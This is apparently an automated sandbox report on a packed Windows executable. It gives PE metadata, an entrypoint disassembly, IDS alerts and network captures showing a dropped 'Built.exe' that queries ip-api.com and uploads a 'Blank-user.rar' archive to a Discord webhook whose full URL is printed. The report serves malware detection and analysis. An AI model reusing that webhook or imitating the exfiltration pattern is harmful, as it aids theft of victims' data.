Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.993919118990983
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	47SXvEQ.exe
File size:	13'090'304 bytes
MD5:	ce5152d5376f6ad0c918fb893248dd08
SHA1:	9d5c6c34c29396d141f4df77166e522d57aca6e3
SHA256:	e3dbee51df9dd78d9b3d643f7d7f9c7cb84b88819647d436f1a595d7c1a51e87
SHA512:	10763c455273fe518dc67f3ca424e2a38d4c997275960d393ed40b11926ee47aff268ae46bdeac4b90c6731828fe78e6fb5a881a4e05f9b4d1a9320bd9769198
SSDEEP:	196608:kDmyd0mQb9Y/2Gq/3jk4oYzDL7HODZa8aGid5+5cjwtJ0M+u6yvxXx5GiESF4wj:k//q942X44oYTLwatd5m0g6C1x5Ma
TLSH:	C0D6334FB4954172F829BDBE946B643BA8C6F02CEE9057508CC5CB487184FF82A1F65B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Q..................................... ....@.......................... ......\......................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x132f000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x51BC99EC [Sat Jun 15 16:44:28 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F87BCB036FAh
setl bh
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
inc ecx
push bx
dec esi
dec ebp
das
xor al, 36h
dec edi
bound ecx, dword ptr [ecx+4Ah]
dec edx
insd
push edi
dec eax
dec eax
jbe 00007F87BCB03762h
push esi
dec edx
popad
je 00007F87BCB0375Bh
push edx
dec esi
jc 00007F87BCB0376Ah
cmp byte ptr [ebx], dh
push edx
jns 00007F87BCB03737h
or eax, 49674B0Ah
cmp byte ptr [edi+43h], dl
jnc 00007F87BCB0373Dh
bound eax, dword ptr [ecx+30h]
pop edx
inc edi
push esp
push 43473163h
aaa
push edi
dec esi
xor ebp, dword ptr [ebx+59h]
push edi
push edx
pop eax
je 00007F87BCB03747h
xor dl, byte ptr [ebx+2Bh]
popad
jne 00007F87BCB0373Ch
dec eax
dec ebp
jo 00007F87BCB03733h
xor dword ptr [edi], esi
inc esp
dec edx
dec ebp
jns 00007F87BCB03740h
insd
jnc 00007F87BCB03760h
aaa
inc esp
inc ecx
inc ebx
xor dl, byte ptr [ecx+4Bh]
inc edx
inc esp
bound esi, dword ptr [ebx]
or eax, 63656B0Ah
jno 00007F87BCB03748h
push edx
insb
js 00007F87BCB03761h
outsb
inc ecx
jno 00007F87BCB03742h
push ebp
inc esi
pop edx
xor eax, dword ptr [ebx+36h]
push eax
aaa
imul edx, dword ptr [ebx+58h], 4Eh
aaa
inc ebx
jbe 00007F87BCB0373Ch
dec ebx
js 00007F87BCB03733h
jne 00007F87BCB03721h
push esp
inc bp
outsb
inc edx
popad
dec ebx
insd
dec ebp
inc edi
xor dword ptr [ecx+36h], esp
push 0000004Bh
sub eax, dword ptr [ebp+33h]
jp 00007F87BCB0374Ch
dec edx
xor bh, byte ptr [edx+56h]
bound eax, dword ptr [edi+66h]
jbe 00007F87BCB0372Ah
dec eax
or eax, 506C720Ah
aaa
xor dword ptr fs:[ebp+62h], ecx
arpl word ptr [esi], si
inc esp
jo 00007F87BCB03763h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xae205b	0x6f	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0xad00b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x10000	0x800	602645d3e322414f3b6784c7b5a384ab	False	0.94482421875	data	7.694717025001675	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x11000	0xad00b0	0xad0200	52c01c796dd21da9bc7e2021436e514c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xae2000	0x1000	0x200	87632fadcd7bef3f7cd73d2c9bdb3a29	False	0.158203125	data	1.0787392978456434	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0xae3000	0x2a3000	0x200	0227d5f17274a0c181e2694b78155ee6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ypfntliq	0xd86000	0x1a8000	0x1a7a00	ca967508e36f7f3b5db3fab06cbece0b	False	0.9943648107848923	data	7.952151955456021	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
furbksed	0xf2e000	0x1000	0x400	ba5f188ed7f72cf3f1014b15450b5347	False	0.76171875	data	6.064338778770932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xf2f000	0x3000	0x2200	e7f754db6a1cf6c0c68a0955e0d456c1	False	0.3460477941176471	DOS executable (COM)	3.8444426245905663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
IMAGE	0x11154	0x42	data	English	United States	0.8939393939393939
RT_RCDATA	0x11198	0x4ea47e	data			0.9982805252075195
RT_RCDATA	0x4fb618	0x5e57a9	data			0.9994783401489258
RT_RCDATA	0xae0dc4	0x94	data			0.8918918918918919
RT_MANIFEST	0xf2d730	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T21:01:26.329826+0100	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.4	51716	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 21:01:12.711169004 CET	49731	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:12.716043949 CET	80	49731	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:12.716113091 CET	49731	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:12.716286898 CET	49731	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:12.721008062 CET	80	49731	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:14.063399076 CET	80	49731	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:14.064259052 CET	49731	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:14.065095901 CET	80	49731	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:14.065144062 CET	80	49731	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:14.065186977 CET	49731	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:14.065186977 CET	49731	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:14.065264940 CET	80	49731	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:14.065327883 CET	49731	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:14.069247007 CET	80	49731	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:14.069310904 CET	49731	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:41.004973888 CET	49740	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:41.009830952 CET	80	49740	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:41.009938002 CET	49740	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:41.010040045 CET	49740	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:41.014976978 CET	80	49740	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:41.501972914 CET	80	49740	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:41.645839930 CET	49740	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:41.784370899 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:41.784404993 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:41.784476042 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:41.808167934 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:41.808183908 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.282752991 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.287856102 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.287878036 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.288856983 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.288918018 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.295824051 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.295891047 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.296099901 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.299624920 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.299644947 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.300195932 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.300220966 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.300409079 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.300441027 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.303929090 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.303947926 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.303967953 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.303975105 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.304052114 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304059029 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.304080963 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304090977 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.304109097 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304121017 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.304145098 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304145098 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304163933 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.304198980 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304209948 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.304227114 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304234028 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.304253101 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304263115 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.304284096 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304302931 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.304321051 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.304330111 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.307795048 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.307806969 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.307913065 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.307919979 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.307933092 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.307939053 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.307955027 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.307966948 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.308020115 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308027983 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.308041096 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308059931 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308109045 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308123112 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308142900 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308196068 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308207989 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308222055 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308259010 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.308322906 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.313420057 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.316371918 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.316382885 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.316401958 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.316420078 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.316431999 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.316482067 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.320194006 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.320209026 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.320261955 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.320288897 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.320302010 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.320369005 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.320521116 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.320628881 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.320636988 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.320652008 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.320662022 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.324187040 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.324198961 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:42.324259996 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:42.326682091 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:43.116036892 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:43.116113901 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:43.116144896 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:43.116173029 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:43.116187096 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:43.116226912 CET	443	49741	162.159.135.232	192.168.2.4
Jan 7, 2025 21:01:43.116231918 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:43.116274118 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:43.117274046 CET	49741	443	192.168.2.4	162.159.135.232
Jan 7, 2025 21:01:43.186898947 CET	49740	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:43.191900969 CET	80	49740	208.95.112.1	192.168.2.4
Jan 7, 2025 21:01:43.191941023 CET	49740	80	192.168.2.4	208.95.112.1
Jan 7, 2025 21:01:47.687114000 CET	57111	53	192.168.2.4	162.159.36.2
Jan 7, 2025 21:01:47.691946983 CET	53	57111	162.159.36.2	192.168.2.4
Jan 7, 2025 21:01:47.692027092 CET	57111	53	192.168.2.4	162.159.36.2
Jan 7, 2025 21:01:47.696881056 CET	53	57111	162.159.36.2	192.168.2.4
Jan 7, 2025 21:01:48.192750931 CET	57111	53	192.168.2.4	162.159.36.2
Jan 7, 2025 21:01:48.280793905 CET	57111	53	192.168.2.4	162.159.36.2
Jan 7, 2025 21:01:48.285883904 CET	53	57111	162.159.36.2	192.168.2.4
Jan 7, 2025 21:01:48.285934925 CET	57111	53	192.168.2.4	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 21:01:08.031869888 CET	52494	53	192.168.2.4	1.1.1.1
Jan 7, 2025 21:01:08.040952921 CET	53	52494	1.1.1.1	192.168.2.4
Jan 7, 2025 21:01:12.682065964 CET	56525	53	192.168.2.4	1.1.1.1
Jan 7, 2025 21:01:12.690218925 CET	53	56525	1.1.1.1	192.168.2.4
Jan 7, 2025 21:01:40.997281075 CET	49936	53	192.168.2.4	1.1.1.1
Jan 7, 2025 21:01:41.004223108 CET	53	49936	1.1.1.1	192.168.2.4
Jan 7, 2025 21:01:41.776700974 CET	51704	53	192.168.2.4	1.1.1.1
Jan 7, 2025 21:01:41.783473015 CET	53	51704	1.1.1.1	192.168.2.4
Jan 7, 2025 21:01:47.681251049 CET	53	58240	162.159.36.2	192.168.2.4
Jan 7, 2025 21:01:48.464735985 CET	53	65486	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 21:01:08.031869888 CET	192.168.2.4	1.1.1.1	0x7fdc	Standard query (0)	blank-16pis.in	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:12.682065964 CET	192.168.2.4	1.1.1.1	0x52cd	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:40.997281075 CET	192.168.2.4	1.1.1.1	0x882e	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:41.776700974 CET	192.168.2.4	1.1.1.1	0x25cb	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 21:01:08.040952921 CET	1.1.1.1	192.168.2.4	0x7fdc	Name error (3)	blank-16pis.in	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:12.690218925 CET	1.1.1.1	192.168.2.4	0x52cd	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:41.004223108 CET	1.1.1.1	192.168.2.4	0x882e	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:41.783473015 CET	1.1.1.1	192.168.2.4	0x25cb	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:41.783473015 CET	1.1.1.1	192.168.2.4	0x25cb	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:41.783473015 CET	1.1.1.1	192.168.2.4	0x25cb	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:41.783473015 CET	1.1.1.1	192.168.2.4	0x25cb	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Jan 7, 2025 21:01:41.783473015 CET	1.1.1.1	192.168.2.4	0x25cb	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	208.95.112.1	80	1420	C:\Users\user\AppData\Local\Temp\Built.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 21:01:12.716286898 CET	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.3.0
Jan 7, 2025 21:01:14.063399076 CET	175	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 20:01:12 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false
Jan 7, 2025 21:01:14.065095901 CET	175	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 20:01:12 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false
Jan 7, 2025 21:01:14.065144062 CET	175	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 20:01:12 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false
Jan 7, 2025 21:01:14.065264940 CET	175	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 20:01:12 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	208.95.112.1	80	1420	C:\Users\user\AppData\Local\Temp\Built.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 21:01:41.010040045 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.3.0
Jan 7, 2025 21:01:41.501972914 CET	381	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 20:01:41 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 31 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	162.159.135.232	443	1420	C:\Users\user\AppData\Local\Temp\Built.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 20:01:42 UTC	302	OUT	POST /api/webhooks/1319333831601422477/Gz1lBx-zJ-f6c5VmTw7-Emfjq_tqsL0pI1D5turBQtQOU8FjLlkxesj3qj89-C61Kjse HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 729612 User-Agent: python-urllib3/2.3.0 Content-Type: multipart/form-data; boundary=f3d0f4c2f8d39500f2ddb3ec81b69ca3
2025-01-07 20:01:42 UTC	16384	OUT	Data Raw: 2d 2d 66 33 64 30 66 34 63 32 66 38 64 33 39 35 30 30 66 32 64 64 62 33 65 63 38 31 62 36 39 63 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 32 b3 53 c2 21 04 00 00 01 0f 6c dc d8 18 31 7d 8a 37 65 9e ea b1 a1 05 f3 f0 99 fe 9f 89 25 b5 1b ab 5b f5 da 10 70 cc 99 f1 fc 6a e4 16 06 5f 1e c8 fe 78 32 43 ac 79 32 3c 31 f6 3f ac 59 4d d0 ce 1b 12 70 5b 48 68 21 80 d1 07 a7 45 5d 99 4a 92 89 66 38 9a 2d 21 28 8b 95 a0 a0 b6 60 71 Data Ascii: --f3d0f4c2f8d39500f2ddb3ec81b69ca3Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!2S!l1}7e%[pj_x2Cy2<1?YMp[Hh!E]Jf8-!(`q
